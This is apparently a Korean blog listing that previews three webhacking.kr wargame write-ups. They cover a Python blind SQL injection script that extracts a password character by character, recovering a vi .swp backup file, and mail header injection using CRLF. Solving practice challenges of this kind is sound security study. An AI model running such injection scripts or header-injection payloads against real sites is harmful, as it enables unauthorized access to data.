webhacking
-
[webhacking.kr] prob 21webhacking/webhacking.kr 2018. 12. 21. 23:25
목표를 향해 나아가자.게싱하는 문제이다.Source Code: import requests url = "http://webhacking.kr/challenge/bonus/bonus-1/index.php" cookies = {"PHPSESSID": ""}list1 = [] for l in range(10): for i in range(ord('0'), ord('z')): text = "2 and ord(substr(pw,"+str(l+20)+",1))="+str(i)+' -- ' params = { "no" : text } response = requests.get( url, params = params, cookies = cookies) if("True" in response.text): print(ch..
-
[webhacking.kr] prob 36webhacking/webhacking.kr 2018. 12. 21. 21:24
목표를 향해 나아가자. 구글링을 한 결과 vi작업 중 비정상적으로 종료될 시 .swp라는 파일이 생성된다. ( 숨김파일 )이제 파일이름만 알아내면 된다. 우리는 이제까지 webhacking.kr에서 index.php 또는 phps를 많이 접했다../index.php.swp 일 것이다.Not Found가 뜨는 것은 처음봐서 다른분들의 풀이를 참고했다. 문제 풀이는 동일했다. 그리고 서버문제로 인해 Not Found가 뜬다고 한다.
-
[webhacking.kr] prob 47webhacking/webhacking.kr 2018. 12. 21. 13:49
목표를 향해 나아가자. Mail Header Injection 문제이다.필자는 mail함수에 이해하는 것이 우선이라 판단하였다.bool mail ( string $to , string $subject , string $message [, string $additional_headers [, string$additional_parameters ]] )additional_parameter에는 헤더를 추가하기 위해 사용된다. Ex) Bcc, cc규칙 1) 헤더를 추가하기 위해서는 CRLF(\r\n)로 구분해주어야 한다.필자는 BurpSuite를 사용하여 풀었다.mail함수의 주석처리로 인해, \r\n(%0d%0a)가 먹히질 않는 것 같다.
-